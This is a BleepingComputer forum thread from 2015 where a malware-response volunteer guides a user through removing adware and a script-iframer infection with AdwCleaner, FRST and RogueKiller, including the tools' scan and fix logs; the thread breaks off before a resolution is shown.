Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

HEUR:Trojan.ScriptIframer constantly blocking malicious urls with svchost.exe


  • This topic is locked This topic is locked
16 replies to this topic

#1 itucs

itucs

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:11:24 AM

Posted 09 December 2015 - 06:17 PM

Hi,
 
Yesterday I started getting popups from Kaspersky, stating that it is blocking malicious urls, even there is no webpage open and running. When I checked the detailed reports, I have seen that it is blocking a trojan named "HEUR:Trojan.ScriptIframer". I ran adwcleaner and rkill. Then I restarted the computer which made me realize the popups starts when the computer is booted even before any browser is open. I googled some stuff and installed malwarebytes and ran a scan with it. It found some malicious files and cleaned them but it didn't solve the issue. Malwarebytes also started to show some popups with different ports and ips but the same process which is "svchost.exe". The popups come up on the startup, when a browser is launched, when a new tab is opened even if it is an empty tab or sometimes when the computer is idle.
 
It is really frustrating as I ran many scans with different tools and none of them seemed to fix the issue. I tried to explain the problem as detailed as possible, the screenshots of the popups are attached. Any help will be appreciated.
 
The log of adwcleaner is pasted below and farbar logs are attached to give it a head start. I couldn't paste the farbar logs because it didn't let me post a message that long so I attached it. Looking to hear from you soon.
 
Thanks.
 
# AdwCleaner v4.104 - Report created 10/12/2015 at 00:27:35
# Updated 05/12/2014 by Xplode
# Database : 2015-12-07.3 [Live]
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Arda - ARDA-PC
# Running from : C:\Users\Arda\Desktop\adwcleaner_4.104.exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
Folder Deleted : C:\_acestream_cache_
Folder Deleted : C:\Users\Arda\AppData\LocalLow\.acestream
Folder Deleted : C:\Users\Arda\AppData\Roaming\KW
Folder Deleted : C:\Users\Arda\AppData\Roaming\acestream
Folder Deleted : C:\Users\Arda\AppData\Roaming\.acestream
 
***** [ Scheduled Tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Key Deleted : HKCU\Software\MozillaPlugins\@acestream.net/acestreamplugin,version=3.0.12
Key Deleted : HKCU\SOFTWARE\Clients\Media\AceStream
Key Deleted : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.acelive
Key Deleted : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.acemedia
Key Deleted : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.acestream
Key Deleted : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tslive
Key Deleted : HKCU\SOFTWARE\Classes\.acelive
Key Deleted : HKCU\SOFTWARE\Classes\.acemedia
Key Deleted : HKCU\SOFTWARE\Classes\.acestream
Key Deleted : HKCU\SOFTWARE\Classes\.tslive
Key Deleted : HKCU\SOFTWARE\Classes\acestream
Key Deleted : HKCU\SOFTWARE\Classes\AceStream.file
Key Deleted : HKCU\SOFTWARE\Classes\Applications\ace_player.exe
Key Deleted : HKCU\SOFTWARE\Classes\MIME\Database\Content Type\application/x-acestream-plugin
Value Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [AceUpdater]
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{CA3A5461-96B5-46DD-9341-5350D3C94615}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
Key Deleted : HKCU\Software\AceStream
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AceStream
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.18098
 
 
-\\ Mozilla Firefox v33.1.1 (x86 en-US)
 
 
-\\ Google Chrome v47.0.2526.80
 
 
-\\ Chromium v
 
 
-\\ Comodo Dragon v
 
 
*************************
 
AdwCleaner[R0].txt - [16867 octets] - [28/10/2014 20:38:16]
AdwCleaner[R1].txt - [1903 octets] - [07/12/2014 00:09:38]
AdwCleaner[R2].txt - [4032 octets] - [09/12/2015 11:09:45]
AdwCleaner[R3].txt - [3138 octets] - [10/12/2015 00:23:21]
AdwCleaner[S0].txt - [14222 octets] - [28/10/2014 20:41:31]
AdwCleaner[S1].txt - [2102 octets] - [07/12/2014 00:12:16]
AdwCleaner[S2].txt - [4253 octets] - [09/12/2015 11:15:42]
AdwCleaner[S3].txt - [3066 octets] - [10/12/2015 00:27:35]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S3].txt - [3126 octets] ##########

Attached Files



BC AdBot (Login to Remove)

 


#2 nasdaq

nasdaq

  • Malware Response Team
  • 38,594 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:24 AM

Posted 10 December 2015 - 11:33 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Remove these programs in bold via the Control Panel > Programs and Features applet.
Internet Explorer için Yandex.Bar 6.7 (HKLM-x32\...\{1D1E60B4-BE61-4219-BDF1-5A7622412130}) (Version: 6.7.0.1913 - Yandex)
Popcorn Time (HKU\S-1-5-21-2870111626-1301175785-2031466506-1002\...\Popcorn Time) (Version: - Popcorn Official)
===

ATTENTION: System Restore is disabled
How to: Turn System Restore ON - Windows < Important
http://windows.microsoft.com/en-ca/windows/turn-system-restore-on-off#1TC=windows-7
<<<>>>

Press the windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.
Please copy the entire contents of the code box below to the a new file.
 
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKU\S-1-5-21-2870111626-1301175785-2031466506-1000\...\Run: [ROC_JAN2013_TB] => "C:\Program Files (x86)\AVG Secure Search\ROC_JAN2013_TB.exe"  /PROMPT /CMPID=JAN2013_TB
HKU\S-1-5-21-2870111626-1301175785-2031466506-1000\...\Run: [AVG-Secure-Search-Update_JUNE2013_TB] => "C:\Program Files (x86)\AVG Secure Search\AVG-Secure-Search-Update_JUNE2013_TB.exe"  /PROMPT /CMPID=JUNE2013_TB
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
Toolbar: HKU\.DEFAULT -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} -  No File
Toolbar: HKU\S-1-5-21-2870111626-1301175785-2031466506-1000 -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} -  No File
Toolbar: HKU\S-1-5-21-2870111626-1301175785-2031466506-1002 -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} -  No File
Handler: WSWSVCUchrome - {1CA93FF0-A218-44F1 -  No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF HKLM-x32\...\Firefox\Extensions: [WSVCU@Wondershare.com] - C:\ProgramData\Wondershare\Video Converter Ultimate\WSVCU@Wondershare.com => not found
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.80\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.80\pdf.dll => No File
CHR Plugin: (AVG SiteSafety plugin) - C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\15.3.0\\npsitesafety.dll => No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.145\npGoogleUpdate3.dll => No File
CHR Plugin: (Java(TM) Platform SE 7 U21) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
CHR Plugin: (Shockwave Flash) - C:\Windows\system32\Macromed\Flash\NPSWF32.dll => No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll => No File
S3 MREMP50; \??\C:\PROGRA~2\COMMON~1\Motive\MREMP50.SYS [X]
S3 MREMP50a64; \??\C:\PROGRA~1\COMMON~1\Motive\MREMP50a64.SYS [X]
S3 MREMPR5; \??\C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS [X]
S3 MRENDIS5; \??\C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS [X]
S3 MRESP50; \??\C:\PROGRA~2\COMMON~1\Motive\MRESP50.SYS [X]
S3 MRESP50a64; \??\C:\PROGRA~1\COMMON~1\Motive\MRESP50a64.SYS [X]
Task: C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job => C:\Windows\TEMP\{17A9BEC7-F5C8-460F-9E6B-639FA6F7429F}.exe <==== ATTENTION
Task: C:\Windows\Tasks\ROC_JAN2013_TB_rmv.job => C:\Program Files (x86)\AVG Secure Search\PostInstall\ROC.exe

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

How is the computer running now?

#3 itucs

itucs
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:11:24 AM

Posted 10 December 2015 - 05:48 PM

Hello nasdaq,

 

Thank you for the quick response, I really appreciate it.

 

I completed the steps in the order you suggested (uninstall the programs, turn system restore on, run the fix). It didn't seem to fix the issue. I still get the popups i attached to the first post continuously. Here is the farbar fix log:

 

Fix result of Farbar Recovery Scan Tool (x64) Version:05-12-2015
Ran by Arda (2015-12-11 00:18:18) Run:1
Running from C:\Users\Arda\Desktop
Loaded Profiles: UpdatusUser & Arda (Available Profiles: UpdatusUser & Arda)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
 
CreateRestorePoint:
EmptyTemp:
CloseProcesses:
 
HKU\S-1-5-21-2870111626-1301175785-2031466506-1000\...\Run: [ROC_JAN2013_TB] => "C:\Program Files (x86)\AVG Secure Search\ROC_JAN2013_TB.exe"  /PROMPT /CMPID=JAN2013_TB
HKU\S-1-5-21-2870111626-1301175785-2031466506-1000\...\Run: [AVG-Secure-Search-Update_JUNE2013_TB] => "C:\Program Files (x86)\AVG Secure Search\AVG-Secure-Search-Update_JUNE2013_TB.exe"  /PROMPT /CMPID=JUNE2013_TB
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
Toolbar: HKU\.DEFAULT -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} -  No File
Toolbar: HKU\S-1-5-21-2870111626-1301175785-2031466506-1000 -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} -  No File
Toolbar: HKU\S-1-5-21-2870111626-1301175785-2031466506-1002 -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} -  No File
Handler: WSWSVCUchrome - {1CA93FF0-A218-44F1 -  No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF HKLM-x32\...\Firefox\Extensions: [WSVCU@Wondershare.com] - C:\ProgramData\Wondershare\Video Converter Ultimate\WSVCU@Wondershare.com => not found
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.80\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.80\pdf.dll => No File
CHR Plugin: (AVG SiteSafety plugin) - C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\15.3.0\\npsitesafety.dll => No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.145\npGoogleUpdate3.dll => No File
CHR Plugin: (Java™ Platform SE 7 U21) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
CHR Plugin: (Shockwave Flash) - C:\Windows\system32\Macromed\Flash\NPSWF32.dll => No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll => No File
S3 MREMP50; \??\C:\PROGRA~2\COMMON~1\Motive\MREMP50.SYS [X]
S3 MREMP50a64; \??\C:\PROGRA~1\COMMON~1\Motive\MREMP50a64.SYS [X]
S3 MREMPR5; \??\C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS [X]
S3 MRENDIS5; \??\C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS [X]
S3 MRESP50; \??\C:\PROGRA~2\COMMON~1\Motive\MRESP50.SYS [X]
S3 MRESP50a64; \??\C:\PROGRA~1\COMMON~1\Motive\MRESP50a64.SYS [X]
Task: C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job => C:\Windows\TEMP\{17A9BEC7-F5C8-460F-9E6B-639FA6F7429F}.exe <==== ATTENTION
Task: C:\Windows\Tasks\ROC_JAN2013_TB_rmv.job => C:\Program Files (x86)\AVG Secure Search\PostInstall\ROC.exe
 
End
*****************
 
Restore point was successfully created.
Processes closed successfully.
HKU\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Windows\CurrentVersion\Run\\ROC_JAN2013_TB => value removed successfully
HKU\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Windows\CurrentVersion\Run\\AVG-Secure-Search-Update_JUNE2013_TB => value removed successfully
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{91397D20-1446-11D4-8AF4-0040CA1127B6} => value not found.
HKCR\CLSID\{91397D20-1446-11D4-8AF4-0040CA1127B6} => key not found. 
HKU\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{91397D20-1446-11D4-8AF4-0040CA1127B6} => value removed successfully
HKCR\CLSID\{91397D20-1446-11D4-8AF4-0040CA1127B6} => key not found. 
HKU\S-1-5-21-2870111626-1301175785-2031466506-1002\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{91397D20-1446-11D4-8AF4-0040CA1127B6} => value not found.
HKCR\CLSID\{91397D20-1446-11D4-8AF4-0040CA1127B6} => key not found. 
"HKCR\PROTOCOLS\Handler\WSWSVCUchrome" => key removed successfully
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully
HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\WSVCU@Wondershare.com => value removed successfully
C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.80\ppGoogleNaClPluginChrome.dll => not found.
C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.80\pdf.dll => not found.
C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\15.3.0\\npsitesafety.dll => not found.
C:\Program Files (x86)\Google\Update\1.3.21.145\npGoogleUpdate3.dll => not found.
C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => not found.
C:\Windows\system32\Macromed\Flash\NPSWF32.dll => not found.
c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll => not found.
MREMP50 => service removed successfully
MREMP50a64 => service removed successfully
MREMPR5 => service removed successfully
MRENDIS5 => service removed successfully
MRESP50 => service removed successfully
MRESP50a64 => service removed successfully
C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job => moved successfully
C:\Windows\Tasks\ROC_JAN2013_TB_rmv.job => moved successfully
EmptyTemp: => 7.5 GB temporary data Removed.
 
 
The system needed a reboot.
 
==== End of Fixlog 00:28:39 ====


#4 nasdaq

nasdaq

  • Malware Response Team
  • 38,594 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:24 AM

Posted 11 December 2015 - 09:04 AM

Reset the browsers that have been compromised.

Reset Chrome...
Open Google Chrome, click on menu icon google-chrome-setting-icon.png which is located right side top of the google chrome.
 
Click "Settings" then "Show advanced settings" at the bottom of the screen.
 
Click "Reset browser settings" button.
 
Clear your cache and cookies
https://support.google.com/chromebook/answer/183083?hl=en
Select "From the beginning of time"

Restart Chrome.

====

Keep me posted.

#5 itucs

itucs
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:11:24 AM

Posted 11 December 2015 - 02:14 PM

Hello nasdaq,

 

I have done that already before posting here, I did it again after your suggestion but it didn't work. I have to say that it is not related to only Chrome. The popups show up when any application that is connected to internet wants to do something. I have seen svchost.exe, steamwebhelper.exe, jucheck.exe and even flux which I am not even sure what it does with a network connection. After a boot, the popups shows after you can significantly see something on the background starts running since the computer stalls for a few seconds then the popups start. This happens even before I start any kind of browser. "Downloading object, which contains a trojan program" is the warning. As I see it, it is a script that is trying to use programs in the background which have network connections and tries to download something with them.

 

I hope I could give enough details to give you a more accurate insight than my first post. Thanks for your help so far, looking forward to hear from you.

 

Arda



#6 nasdaq

nasdaq

  • Malware Response Team
  • 38,594 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:24 AM

Posted 11 December 2015 - 02:22 PM

--RogueKiller--
  • Download & SAVE to your Desktop Download RogueKiller
  • Quit all programs that you may have started.
  • Please disconnect any USB or external drives from the computer before you run this scan!
  • For Vista or Windows 7, right-click and select "Run as Administrator to start"
  • For Windows XP, double-click to start.
  • Wait until Prescan has finished ...
  • When instructed Click on "Scan" button
  • Wait until the Status box shows "Scan Finished"
  • Click on "Report"
  • Click on Export TXT button save the file as RogueReport.txt
  • The file RogueReport.txt will be saved in the desktop.
  • Close the program.
  • Open the file with Notepad and Copy/paste the content into your next reply.
<<<>>>

#7 itucs

itucs
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:11:24 AM

Posted 11 December 2015 - 03:52 PM

Hello nasdaq,

 

I completed the scan but I didn't know if I should delete the potentially unwanted registry keys with the tool as you haven't stated that in your post. I thought you may suggest something else so I am not doing anything until you say so assuming that it should find the same things in a new scan. I will be waiting your response before I go into action so I don't click delete for now. 

 

You can find the log below.

 

Thanks,

 

Arda

 

RogueKiller V11.0.2.0 [Dec  7 2015] (Free) by Adlice Software
 
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Arda [Administrator]
Started from : C:\Users\Arda\Desktop\RogueKiller.exe
Mode : Scan -- Date : 12/11/2015 22:40:32
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 12 ¤¤¤
[PUP] (X86) HKEY_LOCAL_MACHINE\Software\Pandora.TV -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.yandex.com.tr/?win=44&clid=1863612  -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.yandex.com.tr/?win=44&clid=1863612  -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://asus.msn.com  -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://asus.msn.com  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{645D432C-2FCC-424B-BDBD-E537EB70D94A} | DhcpNameServer : 188.59.248.108 86.108.132.165 ([X][-])  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{645D432C-2FCC-424B-BDBD-E537EB70D94A} | DhcpNameServer : 188.59.248.108 86.108.132.165 ([X][-])  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{645D432C-2FCC-424B-BDBD-E537EB70D94A} | DhcpNameServer : 188.59.248.108 86.108.132.165 ([X][-])  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
 
¤¤¤ Tasks : 0 ¤¤¤
 
¤¤¤ Files : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST1000LM024 HN-M101MBB +++++
--- User ---
[MBR] 7469b54249d2406ac14f7d7c22138d9d
[BSP] 73c3af7b8366531e03277fe14d3640cb : Linux|VT.Unknown MBR Code
Partition table:
0 - EF | Offset (sectors): 2048 | Size: 200 MB
1 - Mi | Offset (sectors): 411648 | Size: 128 MB
2 -  | Offset (sectors): 673792 | Size: 839700 MB
3 -  | Offset (sectors): 1817037824 | Size: 41043 MB
4 - [SYSTEM] Ba | Offset (sectors): 1901094912 | Size: 25600 MB
5 -  | Offset (sectors): 1720381440 | Size: 1 MB
6 -  | Offset (sectors): 1720383488 | Size: 39043 MB
7 -  | Offset (sectors): 1800343552 | Size: 8151 MB
User = LL1 ... OK
User = LL2 ... OK


#8 nasdaq

nasdaq

  • Malware Response Team
  • 38,594 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:24 AM

Posted 12 December 2015 - 07:50 AM

Fix everything.
If needed they will be reset.

#9 itucs

itucs
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:11:24 AM

Posted 12 December 2015 - 04:22 PM

Hello nasdaq,

 

I ran the scan again and deleted all the unwanted things in the log below, then restarted the computer but it didn't seem to solve the issue. I still get the popups. I ran another scan after the deletion and reboot but Rogue Killer did not find any more threats. Unfortunately this seems like a dead end too. I will be waiting your instructions for a new approach.

 

Best regards,

 

Arda

 

RogueKiller V11.0.2.0 [Dec  7 2015] (Free) by Adlice Software
 
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Arda [Administrator]
Started from : C:\Users\Arda\Desktop\RogueKiller.exe
Mode : Scan -- Date : 12/12/2015 22:18:46
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 20 ¤¤¤
[PUP] (X86) HKEY_LOCAL_MACHINE\Software\Pandora.TV -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.yandex.com.tr/?win=44&clid=1863612  -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.yandex.com.tr/?win=44&clid=1863612  -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.yandex.com.tr/?win=44&clid=1863612  -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.yandex.com.tr/?win=44&clid=1863612  -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://asus.msn.com  -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://asus.msn.com  -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://asus.msn.com  -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://asus.msn.com  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{645D432C-2FCC-424B-BDBD-E537EB70D94A} | DhcpNameServer : 188.59.248.108 86.108.132.165 ([X][-])  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{645D432C-2FCC-424B-BDBD-E537EB70D94A} | DhcpNameServer : 188.59.248.108 86.108.132.165 ([TURKEY (TR)][-])  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{645D432C-2FCC-424B-BDBD-E537EB70D94A} | DhcpNameServer : 188.59.248.108 86.108.132.165 ([TURKEY (TR)][-])  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-2870111626-1301175785-2031466506-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
 
¤¤¤ Tasks : 0 ¤¤¤
 
¤¤¤ Files : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST1000LM024 HN-M101MBB +++++
--- User ---
[MBR] 7469b54249d2406ac14f7d7c22138d9d
[BSP] 73c3af7b8366531e03277fe14d3640cb : Linux|VT.Unknown MBR Code
Partition table:
0 - EF | Offset (sectors): 2048 | Size: 200 MB
1 - Mi | Offset (sectors): 411648 | Size: 128 MB
2 -  | Offset (sectors): 673792 | Size: 839700 MB
3 -  | Offset (sectors): 1817037824 | Size: 41043 MB
4 - [SYSTEM] Ba | Offset (sectors): 1901094912 | Size: 25600 MB
5 -  | Offset (sectors): 1720381440 | Size: 1 MB
6 -  | Offset (sectors): 1720383488 | Size: 39043 MB
7 -  | Offset (sectors): 1800343552 | Size: 8151 MB
User = LL1 ... OK
User = LL2 ... OK


#10 nasdaq

nasdaq

  • Malware Response Team
  • 38,594 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:24 AM

Posted 13 December 2015 - 08:30 AM

